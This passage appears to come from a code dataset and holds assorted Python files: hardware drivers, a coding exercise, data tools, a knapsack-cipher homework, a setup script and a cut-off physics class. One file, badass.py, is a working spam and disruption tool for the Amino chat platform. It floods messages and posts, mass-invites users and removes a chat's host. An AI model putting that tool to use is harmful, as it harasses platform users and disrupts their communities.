11\r\n# latch = 12\r\n# data = 14\r\n\r\n\r\nclass ControllerCI(object):\r\n def 
+{"seq_id":"650339454","text":"# -*- coding: utf-8 -*-\r\n# IC: 74HC595 shift register\r\n# clock = 11\r\n# latch = 12\r\n# data = 14\r\n\r\n\r\nclass ControllerCI(object):\r\n def __init__(self, clock, latch, data, gpio, qtdCI=1):\r\n self._qtdCI = qtdCI\r\n self._clock = clock\r\n self._latch = latch\r\n self._data = data\r\n self._gpio = gpio\r\n self._iniciarPortas()\r\n self._criarMapaBinario()\r\n\r\n def _iniciarPortas(self):\r\n self._gpio.setup(self._clock, self._gpio.OUT)\r\n self._gpio.setup(self._latch, self._gpio.OUT)\r\n self._gpio.setup(self._data, self._gpio.OUT)\r\n\r\n def _criarMapaBinario(self):\r\n self._ci = [[0, 0, 0, 0, 0, 0, 0, 0] for x in range(self._qtdCI)]\r\n\r\n def _escreverMapaBinario(self, pino, estado):\r\n if (pino <= self._qtdCI * 8) and (pino != 0):\r\n self._ci[int((pino - 1) / 8)][(pino - 1) % 8] = estado\r\n else:\r\n print(f'Pin {pino} is invalid')\r\n\r\n def _atualizarEstado(self):\r\n self._gpio.output(self._latch, 0)\r\n\r\n for ci in range(self._qtdCI - 1, -1, -1):\r\n for pin in range(7, -1, -1):\r\n self._gpio.output(self._clock, 0)\r\n self._gpio.output(self._data, self._ci[ci][pin])\r\n self._gpio.output(self._clock, 1)\r\n self._gpio.output(self._data, 0)\r\n\r\n self._gpio.output(self._latch, 1)\r\n\r\n def write(self, pin, value, ci=0):\r\n if ci == 0:\r\n self._escreverMapaBinario(pin, value)\r\n self._atualizarEstado()\r\n elif (ci != 0 and ci <= self._qtdCI) and pin <= 8:\r\n pin = pin + ((ci - 1) * 8) \r\n self._escreverMapaBinario(pin, value)\r\n self._atualizarEstado()\r\n else:\r\n print('Invalid CI or pin')\r\n \r\n def clearAll(self):\r\n for pino in range(self._qtdCI * 8):\r\n self._escreverMapaBinario(pino + 1, 0)\r\n self._atualizarEstado()\r\n\r\n def setAll(self):\r\n for pino in range(self._qtdCI * 8):\r\n self._escreverMapaBinario(pino + 1, 1)\r\n self._atualizarEstado()\r\n","sub_path":"controller_ci.py","file_name":"controller_ci.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
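A usage sketch for the ControllerCI shift-register driver above; it assumes a Raspberry Pi with the RPi.GPIO package installed, and the BCM pin numbers are illustrative (taken from the comment block at the top of the file, not verified hardware wiring):

import RPi.GPIO as GPIO

from controller_ci import ControllerCI

GPIO.setmode(GPIO.BCM)
ci = ControllerCI(clock=11, latch=12, data=14, gpio=GPIO, qtdCI=2)  # two daisy-chained 74HC595s
ci.write(pin=3, value=1, ci=2)  # drive output 3 on the second chip high
ci.clearAll()                   # switch every output off again
GPIO.cleanup()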
+{"seq_id":"535254025","text":"# Write a Python file that uploads an image to your \n# Twitter account. Make sure to use the \n# hashtags #UMSI-206 #Proj3 in the tweet.\n\n# You will demo this live for grading.\nOAUTH_TOKEN = 'XXX'\nOAUTH_TOKEN_SECRET = 'XXX'\nAPP_KEY = 'XXX'\nAPP_SECRET = 'XXX'\n\n\nfrom twython import Twython\ntwitter = Twython(APP_KEY, APP_SECRET,\n OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\n\nphoto = open('/Users/AditiRajadhyaksha/Desktop/project3/HW3-StudentCopy/media/tweet_image.jpg', 'rb')\nresponse = twitter.upload_media(media=photo)\ntwitter.update_status(status='Submission for SI 206 Project 3 #UMSI-206 #Proj3', media_ids=[response['media_id']])","sub_path":"HW3-StudentCopy/twitterhw3a.py","file_name":"twitterhw3a.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"92106522","text":"# Example 1:\n\n# Input:\n# beginWord = \"hit\",\n# endWord = \"cog\",\n# wordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]\n\n# Output: 5\n\n# Explanation: As one shortest transformation is \"hit\" -> \"hot\" -> \"dot\" -> \"dog\" -> \"cog\",\n# return its length 5.\n\n\n# Example 2:\n\n# Input:\n# beginWord = \"hit\"\n# endWord = \"cog\"\n# wordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]\n\n# Output: 0\n\n# Explanation: The endWord \"cog\" is not in wordList, therefore no possible transformation.\n\nfrom string import ascii_lowercase\nimport copy\n\nclass Node:\n\tdef __init__(self, word, path):\n\t\tself.word = word\n\t\tself.path = path\n\ndef ladder(begin, end, word_list):\n\tqueue = []\n\n\twords = set(word_list)\n\n\tqueue.append(Node(begin, [begin]))\n\n\twhile len(queue) > 0:\n\t\tcur = queue.pop(0)\n\n\t\tcur_word = cur.word\n\t\tpath = cur.path\n\n\t\tif cur_word == end:\n\t\t\treturn path\n\n\t\tfor i in range(len(cur_word)):\n\t\t\tfor c in ascii_lowercase:\n\t\t\t\tpotential_word = cur_word[:i] + c + cur_word[i+1:]\n\n\t\t\t\tif potential_word in words:\n\t\t\t\t\tcopy_path = copy.deepcopy(path)\n\t\t\t\t\tcopy_path.append(potential_word)\n\t\t\t\t\tqueue.append(Node(potential_word, copy_path))\n\t\t\t\t\twords.remove(potential_word)\n\n\treturn []\n\nprint(ladder(\"hit\", \"cog\", [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]))\nprint(ladder(\"hit\", \"cog\", [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]))\n","sub_path":"Cracking Coding Interviews - Mastering Algorithms/src/Section 5 Graphs/word-ladder.py","file_name":"word-ladder.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
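The BFS above deep-copies the whole path for every neighbour it enqueues; because a path is only ever extended, plain list concatenation gives the same result without the copy module. A sketch of just the inner check:

if potential_word in words:
    # path + [potential_word] already builds a fresh list, so no deepcopy is needed
    queue.append(Node(potential_word, path + [potential_word]))
    words.remove(potential_word)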
+{"seq_id":"403339941","text":"import numpy as np\nimport pandas as pd\nfrom scipy.optimize import minimize\nimport scipy.stats as st\nimport statsmodels.api as sm\nimport tools.Sample_Tools as smpl\n\n\nfrom sklearn import linear_model\n\ndef neutralize(factor:pd.Series, data, categorical:list=None, logarithmetics:list=None):\n '''Factor neutralization:\n :param categorical:{list} --columns that need to be dummy-encoded\n :param logarithmetics:{list} --columns that should be log-transformed\n Note: the values of categorical columns must be strings.\n Note: the usual order is winsorize -> neutralize -> standardize.\n Note: operates on a single cross-section.\n '''\n if factor.index.is_monotonic_increasing == False or data.index.is_monotonic_increasing == False:\n import warnings\n warnings.warn('factor or data should be sorted, otherwise the independent and dependent variables may be mismatched',UserWarning)\n \n X = data.copy()\n # log-transform\n if not logarithmetics is None:\n X[logarithmetics] = X[logarithmetics].agg('log')\n # dummy variables\n if not categorical is None:\n X = pd.get_dummies(X, columns=categorical)\n \n# print(X)\n \n model = linear_model.LinearRegression().fit(X, factor)\n neutralize_factor = factor - model.predict(X)\n\n return neutralize_factor\n\n \n\n# def winsorize_by_quantile_multidates(obj, floor=0.025, upper=0.975, column=None, drop=True):\n# Removes global outliers; per-date processing makes no sense here\n# return excute_for_multidates(obj, winsorize_by_quantile, floor=floor,upper=upper, column=column, drop=drop).sort_index()\n\ndef winsorize_by_quantile(obj, floor=0.025, upper=0.975, column=None, drop=True):\n \"\"\"\n Select data within the given quantile bounds.\n :param obj:{pd.DataFrame | pd.Series} \n :param column:{str} --when obj is a DataFrame, names the column to process.\n :param drop:{bool} --how to treat data outside the quantiles:\n True: drop the whole row;\n False: replace out-of-range values with the boundary values\n \"\"\"\n if isinstance(obj, pd.Series):\n qt = obj.quantile([floor,upper])\n if drop:\n return obj[(obj>=qt[floor]) & (obj<=qt[upper])]\n else:\n obj[obj < qt[floor]] = qt[floor]\n obj[obj > qt[upper]] = qt[upper]\n return obj\n \n if isinstance(obj, pd.DataFrame):\n assert column, 'COLUMN CANT be NONE when obj is dataframe'\n qt = obj[column].quantile([floor,upper])\n if drop:\n return obj[(obj[column]>=qt[floor]) & (obj[column]<=qt[upper])]\n else:\n obj.loc[obj[column] < qt[floor], column] = qt[floor]\n obj.loc[obj[column] > qt[upper], column] = qt[upper]\n return obj\n \n raise TypeError('obj must be series or dataframe')\n\n# standardize\ndef standardize(data, multi_code=False):\n if multi_code:\n return data.groupby(level=1, group_keys=False).apply(lambda x: standardize(x,multi_code=False))\n else:\n return (data - data.mean())/data.std()\n\ndef binning(df, deal_column:str,box_count:int, labels=None, inplace=True):\n \"\"\"\n Binning: adds a column named \"group_label\" to df as the group tag.\n :param df:{pd.DataFrame} \n :param deal_column:{str} --name of the column to process,\n :param box_count:{int} --number of bins,\n :param labels:{list} --labels for the groups; defaults to the group index (default:None)\n By default the generated labels are reversed, i.e. the smallest values land in the last group.\n :param inplace:{bool} --whether to modify the object in place; True is recommended for efficiency (default:True)\n :return: {pd.DataFrame}\n \"\"\"\n assert isinstance(df, pd.DataFrame), 'df must be a DataFrame'\n if not labels is None:\n assert len(labels)==box_count, 'the number of labels must equal the number of bins'\n labels_= labels\n else:\n labels_= np.array(range(box_count))+1\n labels_ = labels_[::-1]\n \n reality_count = len(set(df[deal_column].values))\n \n if inplace:\n if box_count > reality_count:\n # Many zeros or NaNs can leave fewer distinct values than bins; treat that as a failure and return empty labels\n df['group_label'] = None\n return df\n else:\n df['group_label'] = pd.qcut(df[deal_column], box_count, labels=labels_,retbins=False)\n return df\n else:\n if box_count > reality_count:\n # Many zeros or NaNs can leave fewer distinct values than bins; treat that as a failure and return empty labels\n return df.assign(group_label=None)\n else:\n return df.assign(group_label=pd.qcut(df[deal_column], box_count, labels=labels_,retbins=False))\n\n","sub_path":"tools/Pretreat_Tools.py","file_name":"Pretreat_Tools.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
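A small end-to-end sketch of the order the neutralize docstring recommends (winsorize -> neutralize -> standardize). The toy factor, column names and distributions below are invented for illustration, and it assumes the three helpers above are importable and a pandas version where DataFrame.agg('log') applies numpy's log, as neutralize expects:

import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
factor = pd.Series(rng.standard_normal(100))
exposures = pd.DataFrame({
    "market_cap": rng.lognormal(10, 1, 100),   # strictly positive, so the log is safe
    "industry": rng.choice(["tech", "bank"], 100),
})

clipped = winsorize_by_quantile(factor, drop=False)           # 1. clip outliers to the quantile bounds
neutral = neutralize(clipped, exposures,                      # 2. regress the exposures out of the factor
                     categorical=["industry"],
                     logarithmetics=["market_cap"])
scores = standardize(neutral)                                 # 3. z-score the residual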
+{"seq_id":"469952431","text":"import os\nimport time\nimport itertools\nimport shutil\nimport re\nimport importlib.util\n\nconfig_spec = importlib.util.spec_from_file_location(\"config\", \"..\\\\config.py\")\nconfig = importlib.util.module_from_spec(config_spec)\nconfig_spec.loader.exec_module(config)\nfrom pprint import pprint\n\nignore_dirs = [\".git\", \"bin\", \"obj\", \".vs\"]\nignore_files = [\"dll\", \"exe\", \"pdb\", \"map\"]\n\n\ndef format_filemtime(path):\n filemtime = os.path.getmtime(path)\n return time.strftime('%Y-%m-%d', time.gmtime(filemtime))\n\n\ndef ignore_dir(dirpath):\n for dir in ignore_dirs:\n pattern = r\"\\\\\" + re.escape(dir) + r\"(\\\\|$)\"\n if re.search(pattern, dirpath):\n return True\n return False\n\n\ndef ignore_file(file_name):\n for ext in ignore_files:\n pattern = r\"\\.\" + ext + \"$\"\n if re.search(pattern, file_name):\n return True\n return False\n\n\ndef sanitize(path):\n start = time.perf_counter()\n\n for (dirpath, dirnames, filenames) in os.walk(path):\n if ignore_dir(dirpath):\n continue\n searchable_filenames = [filename for filename in filenames if not ignore_file(filename)]\n for filename in searchable_filenames:\n full_name = os.path.join(dirpath, filename)\n\n # without 'ignore' it throws for some files the UnicodeDecodeError 'utf-8' codec can't decode byte XXX in position XXX: invalid start byte\n with open(full_name, 'r', encoding=\"utf8\", errors=\"ignore\") as searchable:\n text = searchable.read()\n if config.re_forbidden.search(text):\n pprint(full_name)\n\n end = time.perf_counter()\n elapsed = round(end - start, 2)\n print(f\"elapsed: {elapsed} sec\")","sub_path":"src/sanitizer1.py","file_name":"sanitizer1.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"514911827","text":"import os\np=\"/Users/joker/Downloads/data/\"\ntarget=\"midi.lab.corrected.lab\"\nos.chdir(p)\nfor dname in os.listdir(p):\n if os.path.isdir(dname):\n oldname=os.path.basename(dname)\n newname=dname[0:4]\n os.rename(p+oldname, p+newname)\nprint(\"success\")\n","sub_path":"structural_analysis/data_prep/individual_modules/prepare_file.py","file_name":"prepare_file.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"351007144","text":"#!/usr/bin/python3\n\nimport math\n\ndef bin_list_to_int(bit_array: list):\n return int(''.join(str(x) for x in bit_array), 2)\n\n\n# From collection find the biggest value that is less than or equal to the given element.\n# On failure returns -1\ndef find_max_less(collection: list, element: int):\n biggest = -1\n\n for value in collection:\n if value <= element and value > biggest:\n biggest = value\n\n return biggest\n\n\ndef find_s(public_key: list, w0: int, p: int):\n # s only matters modulo p, so scanning 1..p-1 covers every candidate\n for s in range(1, p):\n if math.gcd(s, w0) == 1 and (public_key[0] * s) % p == w0:\n print(s)\n\n\ndef decrypt(cypher: list, public_key: list, w: list, p: int, s: int):\n cypher = [(cypher[i] * s) % p for i in range(len(cypher))]\n\n decrypted = ''\n\n for c in cypher:\n dec_bin = [0 for _ in range(8)]\n\n while c != 0:\n largest = find_max_less(w, c)\n dec_bin[w.index(largest)] = 1\n c -= largest\n\n decrypted += chr(bin_list_to_int(dec_bin))\n\n return decrypted\n\n\ndef main():\n cypher = [242380, 697344, 363065, 515430, 734202, 717157, 98590, 643066, 498385, 98590, 515430, 771435, 643066, 498385, 515430, 363065, 717157, 98590, 515430, 643066, 697344, 515430, 363065, 717157]\n public_key = [197329, 45703, 98590, 98087, 280001, 273050, 256005, 218772]\n\n p = 289646 # mod\n s = 155467 # found with find_s (may not be the first candidate printed)\n\n w = [(public_key[i] * s) % p for i in range(len(public_key))]\n\n\n '''\n # For finding s:\n w0 = 1907\n find_s(public_key, w0, p)\n '''\n \n\n print(f'Key = {w}')\n print(f'Text = {decrypt(cypher, public_key, w, p, s)}')\n\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"10 Pratybos/knapsack_cryptosystem.py","file_name":"knapsack_cryptosystem.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
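Since find_s has to satisfy public_key[0] * s ≡ w0 (mod p), the brute-force scan can be replaced on Python 3.8+ by a direct modular inverse. A sketch using the constants from main() above (it assumes public_key[0] and p are coprime; pow raises ValueError otherwise):

p = 289646
w0 = 1907
first_key = 197329  # public_key[0] in main()

s = (w0 * pow(first_key, -1, p)) % p  # pow(x, -1, m) computes the modular inverse (Python 3.8+)
assert (first_key * s) % p == w0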
+{"seq_id":"616562348","text":"from multiprocessing.pool import ThreadPool\n\nfrom termcolor import colored\n\nimport amino\n\n\nclass Badass:\n def __init__(self, sub_client: amino.SubClient):\n self.sub_client = sub_client\n\n def send_system_message(self, chatid: str):\n self.sub_client.join_chat(chatid)\n while True:\n message_type = int(input(\"Message type: \"))\n message = input(\"Message: \")\n try:\n self.sub_client.send_message(chatId=chatid, messageType=message_type, message=message)\n print(\"Message sent\")\n except amino.exceptions.ChatViewOnly:\n print(colored(\"Chat is in view-only mode\", \"red\"))\n except:\n pass\n choice = input(\"Repeat?(y/n): \")\n if choice.lower() == \"n\":\n break\n\n def spam_system_message(self, chatid: str):\n pool_count = int(input(\"Number of threads: \"))\n pool = ThreadPool(pool_count)\n count_messages = int(input(\"Count of messages: \"))\n message_type = int(input(\"Message type: \"))\n message = input(\"Message: \")\n self.sub_client.join_chat(chatid)\n while True:\n for _ in range(count_messages):\n print(\"Message sent\")\n pool.apply_async(self.sub_client.send_message, [chatid, message, message_type])\n choice = input(\"Repeat?(y/n): \")\n if choice.lower() == \"n\":\n break\n\n def delete_chat(self, chatid: str):\n chat = self.sub_client.get_chat_thread(chatId=chatid)\n admins = [*chat.coHosts, chat.author.userId]\n if self.sub_client.profile.userId in admins:\n self.sub_client.kick(chatId=chatid, allowRejoin=False, userId=chat.author.userId)\n print(\"Chat deleted\")\n else:\n print(colored(\"You don't have co-host/host rights to use this function\", \"red\"))\n\n def invite_all_users(self, chatid: str):\n pool = ThreadPool(100)\n count = 0\n for i in range(0, 10000, 100):\n users = self.sub_client.get_online_users(start=i, size=100).profile.userId\n if not users:\n break\n for userid in users:\n pool.apply_async(self.sub_client.invite_to_chat, [userid, chatid])\n count += 1\n print(f\"{count} users invited to chat\", end=\"\\r\")\n print(\"All online users invited to chat\")\n\n def spam_posts(self):\n pool_count = int(input(\"Number of threads: \"))\n pool = ThreadPool(pool_count)\n posts_count = int(input(\"Count of posts: \"))\n title = input(\"Post title: \")\n content = input(\"Post content: \")\n while True:\n for i in range(posts_count):\n print(\"Post sent\")\n pool.apply_async(self.sub_client.post_blog, [title, content])\n choice = input(\"Repeat?(y/n): \")\n if choice.lower() == \"n\":\n break\n","sub_path":"src/scripts/badass.py","file_name":"badass.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
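The ThreadPool instances above are created but never closed; multiprocessing pools support the context-manager protocol, which tears the workers down deterministically. A generic sketch of that pattern (not tied to the class above):

from multiprocessing.pool import ThreadPool

with ThreadPool(8) as pool:
    handles = [pool.apply_async(print, [i]) for i in range(4)]
    for handle in handles:
        handle.wait()  # make sure every task ran before the pool is torn down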
+{"seq_id":"547484398","text":"class Route():\n def __init__(self, city1, city2, length, locomotives, color, is_tunnel, is_claimed):\n self.city1 = city1\n self.city2 = city2\n self.length = length\n self.locomotives = locomotives\n self.color = color\n self.is_tunnel = is_tunnel\n self.is_claimed = is_claimed\n\n def to_str(self):\n # res = f'city1: {self.city1}, city2: {self.city2}, color: {self.color}, length: {self.length}, locomotives: {self.locomotives}, tunnel: {self.is_tunnel}, claimed?: {self.is_claimed}'\n if self.is_tunnel:\n return f'{self.city1} -> {self.city2} -- tunnel'\n else:\n return f'{self.city1} -> {self.city2}'\n\n def claim(self, player):\n self.is_claimed = player.name\n\n\nclass City():\n def __init__(self, name):\n self.Routes = []\n self.name = name\n self.station = None\n\n # Adds a route to the list of routes leaving this city\n def add_Route(self, Route):\n self.Routes.append(Route)\n\n # Checks whether the city already has a station\n def is_occupied(self):\n return self.station != None\n\n def to_str(self):\n res = f'name: {self.name}, list of routes:\\n'\n return res\n\n\n\nclass Board():\n def __init__(self, Cities, Routes):\n self.Cities = Cities\n self.Routes = Routes\n self.faceupCards = []\n\n # Returns a string listing the free cities\n def to_str_freeCities(self):\n res = ''\n for city in self.Cities:\n if not city.is_occupied():\n res += f'{city.name}, '\n return res\n\n # Returns a string listing the unclaimed routes\n def to_str_freeRoutes(self):\n res = ''\n for route in self.Routes:\n if not route.is_claimed:\n res += f'{route.to_str()}, \\n'\n return res\n\n # Places cards face-up on the table\n def add_faceup_cards(self, cards):\n for card in cards:\n self.faceupCards.append(card)\n\n # Prints the cards on the table\n def to_str_faceup(self):\n res = ''\n i = 1\n for card in self.faceupCards:\n res += f'{i}. '\n res += card.to_str()\n res += '\\n'\n i += 1\n return res\n\n # Returns the selected cards from the board and replaces them with new ones\n def pick_faceup(self, numbers, cards):\n res = []\n temp = []\n print(numbers)\n for number in numbers:\n res.append(self.faceupCards[number])\n for number in numbers:\n temp.append(self.faceupCards[number])\n for el in temp:\n self.faceupCards.remove(el)\n self.add_faceup_cards(cards)\n return res\n","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"137367635","text":"import setuptools # this is the \"magic\" import\nfrom numpy.distutils.core import setup\nfrom glob import glob\nfrom numpy.distutils import exec_command\nfrom shutil import move\nfrom sys import argv\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\n#make clean every time slows things but is needed because users will mostly install after changing networks\n#and a make never seems to fully update the new network\nstatus, output = exec_command.exec_command(\n \"make clean\", execute_in=\"src/fortran_src/\", use_shell=True\n)\n\nstatus, output = exec_command.exec_command(\n \"make python\", execute_in=\"src/fortran_src/\", use_shell=True\n)\n\nwrap_file = glob(\"src/fortran_src/uclchemwrap*.so\")[0]\nmove(wrap_file, \"src/uclchem/uclchemwrap.so\")\n\n\nexec(open(\"src/uclchem/__version__.py\").read())\nsetup(\n name=\"uclchem\", # Replace with your own username\n version=__version__,\n author=\"Jonathan Holdship\",\n author_email=\"jonholdship@gmail.com\",\n description=\"A package for chemical modelling\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://uclchem.github.io\",\n packages=setuptools.find_packages(where=\"src\"),\n package_dir={\"uclchem\": \"src/uclchem\"},\n package_data={\"uclchem\": [\"uclchemwrap.so\"]},\n data_files=[(\"uclchem\", glob(\"src/*.csv\"))],\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=3.6\",\n install_requires=[\"pandas\", \"numpy\", \"pyyaml\", \"matplotlib\", \"seaborn\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
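A post-install smoke test for the build above (hedged: it assumes the package layout in setup.py, i.e. that the f2py-built uclchemwrap.so is importable as a submodule of uclchem):

import uclchem
from uclchem import uclchemwrap  # the shared object moved into src/uclchem by this script

print(uclchem.__version__)       # set by exec'ing src/uclchem/__version__.py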
+{"seq_id":"386244250","text":"#Import dependencies\nimport os\nimport csv\n\n#Provide File Path\nelection = os.path.join('..', 'Resources', 'election_data.csv')\n\ntotalVotes = 0\ncandidateList = {}\nwinner = ''\nmostVotes = 0\n\n#Read in the csv file\nwith open(election, 'r') as csvfile:\n #split the data on commas\n csvreader = csv.reader(csvfile)\n #skip the header row\n header = next(csvreader)\n\n for row in csvreader:\n voterID = row[0]\n candidate = row[2]\n\n #Total number of votes cast\n totalVotes += 1\n #Populate candidateList with candidates\n if candidate not in candidateList:\n #The first time a new candidate is encountered, add it to the list with a vote count of 1\n candidateList[candidate] = 1\n else:\n #Each additional time the candidate is encountered, increment their vote count\n candidateList[candidate] += 1\n\n #Iterate over the candidates to determine the winner\n for candidate in candidateList:\n if candidateList[candidate] > mostVotes:\n mostVotes = candidateList[candidate]\n winner = candidate\n\noutputText = f\"\"\"Election Results \n----------------------------\nTotal Votes: {totalVotes} \n----------------------------\"\"\"\nfor candidate in candidateList:\n outputText += f\"\\n{candidate}: {round(candidateList[candidate] / totalVotes * 100, 3)}% ({candidateList[candidate]})\"\noutputText += f\"\"\"\\n----------------------------\nWinner: {winner}\n----------------------------\"\"\"\n\n#Print the analysis to the terminal... \nprint(outputText) \n \n#...and export to a text file with the results\noutputFile = os.path.join('..', 'analysis', 'PyPollOutput.txt')\nwith open(outputFile, 'w') as datafile:\n datafile.write(outputText)","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"176497078","text":"import os\n\nfrom pylammpsmpi import LammpsASELibrary\n\nfrom pyiron_lammps.potential import view_potentials\n\n\ndef update_potential_paths(df_pot, resource_path):\n config_lst = []\n for row in df_pot.itertuples():\n potential_file_lst = row.Filename\n potential_file_path_lst = [\n os.path.join(resource_path, f) for f in potential_file_lst\n ]\n potential_dict = {os.path.basename(f): f for f in potential_file_path_lst}\n potential_commands = []\n for l in row.Config:\n l = l.replace(\"\\n\", \"\")\n for key, value in potential_dict.items():\n l = l.replace(key, value)\n potential_commands.append(l)\n config_lst.append(potential_commands)\n df_pot[\"Config\"] = config_lst\n return df_pot\n\n\ndef get_lammps_engine(\n working_directory=None,\n cores=1,\n comm=None,\n logger=None,\n log_file=None,\n library=None,\n diable_log_file=True,\n):\n return LammpsASELibrary(\n working_directory=working_directory,\n cores=cores,\n comm=comm,\n logger=logger,\n log_file=log_file,\n library=library,\n diable_log_file=diable_log_file,\n )\n\n\ndef get_potential_dataframe(structure, resource_path):\n return update_potential_paths(\n df_pot=view_potentials(structure=structure, resource_path=resource_path),\n resource_path=resource_path,\n )\n","sub_path":"pyiron_lammps/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"}
+{"seq_id":"466639652","text":"from fastapi import APIRouter, Depends, HTTPException\nfrom sqlalchemy.orm import Session\nfrom app import crud, models, schemas\nfrom app.database import SessionLocal, engine\nfrom typing import List\n\nrouter = APIRouter()\n\nmodels.Base.metadata.create_all(bind=engine)\n\n# Dependency\ndef get_db():\n db = SessionLocal()\n 
try:\n yield db\n finally:\n db.close()\n\n\n@router.get(\n \"/points/season/{season}\",\n response_model=List[schemas.PointEvent],\n summary=\"point logs for a season\",\n)\ndef read_season(season: str, db: Session = Depends(get_db)):\n db_season = crud.get_points_by_season(db, season=season)\n if db_season is None:\n raise HTTPException(status_code=404, detail=\"Season not found\")\n return db_season\n","sub_path":"app/routers/seasons.py","file_name":"seasons.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"135386560","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# This file is part of the udkm1Dsimpy module.\n#\n# udkm1Dsimpy is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, see .\n#\n# Copyright (C) 2019 Daniel Schick\n\n__all__ = [\"UnitCell\"]\n\n__docformat__ = \"restructuredtext\"\n\nimport numpy as np\nfrom inspect import isfunction\nfrom sympy import integrate, Symbol\nfrom sympy.utilities.lambdify import lambdify\nfrom tabulate import tabulate\nfrom . import u, Q_\n\n\nclass UnitCell:\n \"\"\"UnitCell\n\n The unitCell class hold different structural properties of real\n physical unit cells and also an array of atoms at different postions\n in the unit cell.\n\n Args:\n id (str): id of the UnitCell\n name (str): name of the UnitCell\n c_axis (float): c-axis of the UnitCell\n\n Keyword Args:\n a_axis (float): a-axis of the UnitCell\n b_axis (float): b-axis of the UnitCell\n deb_wal_fac (float): Debye Waller factor\n sound_vel (float): sound velocity\n phonon_damping (float): phonon damping\n opt_pen_depth (float): optical penetration depth\n opt_ref_index (float): refractive index\n opt_ref_index_per_strain (float): change of refractive index per\n strain\n heat_capacity (float): heat capacity\n therm_cond (float): thermal conductivity\n lin_therm_exp (float): linear thermal expansion\n sub_system_coupling (float): sub-system coupling\n\n Attributes:\n id (str): id of the unit cell\n name (str): name of the unit cell\n atoms (list[atom, @lambda]): list of atoms and funtion handle\n for strain dependent displacement\n num_atoms (int): number of atoms in unit cell\n spring_const (ndarray[float]): spring constant of the unit cell\n [kg/s²] and higher orders\n opt_ref_index (ndarray[float]): optical refractive index - real\n and imagenary part :math:`n + i\\kappa`\n opt_ref_index_per_strain (ndarray[float]): optical refractive\n index change per strain - real and imagenary part\n :math:`\\\\frac{d n}{d \\eta} + i\\\\frac{d \\kappa}{d \\eta}`\n therm_cond (list[@lambda]): list of HANDLES T-dependent thermal\n conductivity [W/(m K)]\n lin_therm_exp (list[@lambda]): list of HANDLES T-dependent\n linear thermal expansion coefficient (relative)\n int_lin_therm_exp (list[@lambda]): list of HANDLES T-dependent\n integrated linear thermal expansion coefficient\n heat_capacity (list[@lambda]): list of HANDLES T-dependent heat\n capacity function [J/(kg 
K)]\n int_heat_capacity (list[@lambda]): list of HANDLES T-dependent\n integrated heat capacity function\n sub_system_coupling (list[@lambda]): list of HANDLES of coupling\n functions of different subsystems [W/m³]\n num_sub_systems (int): number of subsystems for heat and phonons\n (electrons, lattice, spins, ...)\n\n \"\"\"\n\n def __init__(self, id, name, c_axis, **kwargs):\n self.id = id\n self.name = name\n self.c_axis = c_axis\n self.a_axis = kwargs.get('a_axis', self.c_axis)\n self.b_axis = kwargs.get('b_axis', self.a_axis)\n self.atoms = []\n self.num_atoms = 0\n self.mass = 0*u.kg\n self.density = 0*u.kg/u.m**2\n self.spring_const = np.array([0])\n self.deb_wal_fac = kwargs.get('deb_wal_fac', 0*u.m**2)\n self.sound_vel = kwargs.get('sound_vel', 0)\n self.phonon_damping = kwargs.get('phonon_damping', 0*u.kg/u.s)\n self.opt_pen_depth = kwargs.get('opt_pen_depth', 0*u.nm)\n self.opt_ref_index = kwargs.get('opt_ref_index', 0)\n self.opt_ref_index_per_strain = kwargs.get('opt_ref_index_per_strain', 0)\n self.heat_capacity, self.heat_capacity_str = self.check_cell_array_input(\n kwargs.get('heat_capacity', 0))\n self.therm_cond, self.therm_cond_str = self.check_cell_array_input(\n kwargs.get('therm_cond', 